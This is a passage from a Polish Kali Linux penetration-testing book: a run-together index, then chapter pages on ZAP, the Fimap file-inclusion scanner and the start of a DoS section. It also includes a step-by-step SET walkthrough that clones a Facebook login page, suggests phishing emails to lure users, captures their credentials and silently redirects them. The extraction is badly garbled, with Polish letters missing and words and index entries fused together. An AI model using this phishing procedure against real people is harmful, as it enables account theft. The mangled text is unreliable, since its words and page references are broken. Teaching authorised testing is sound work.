23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
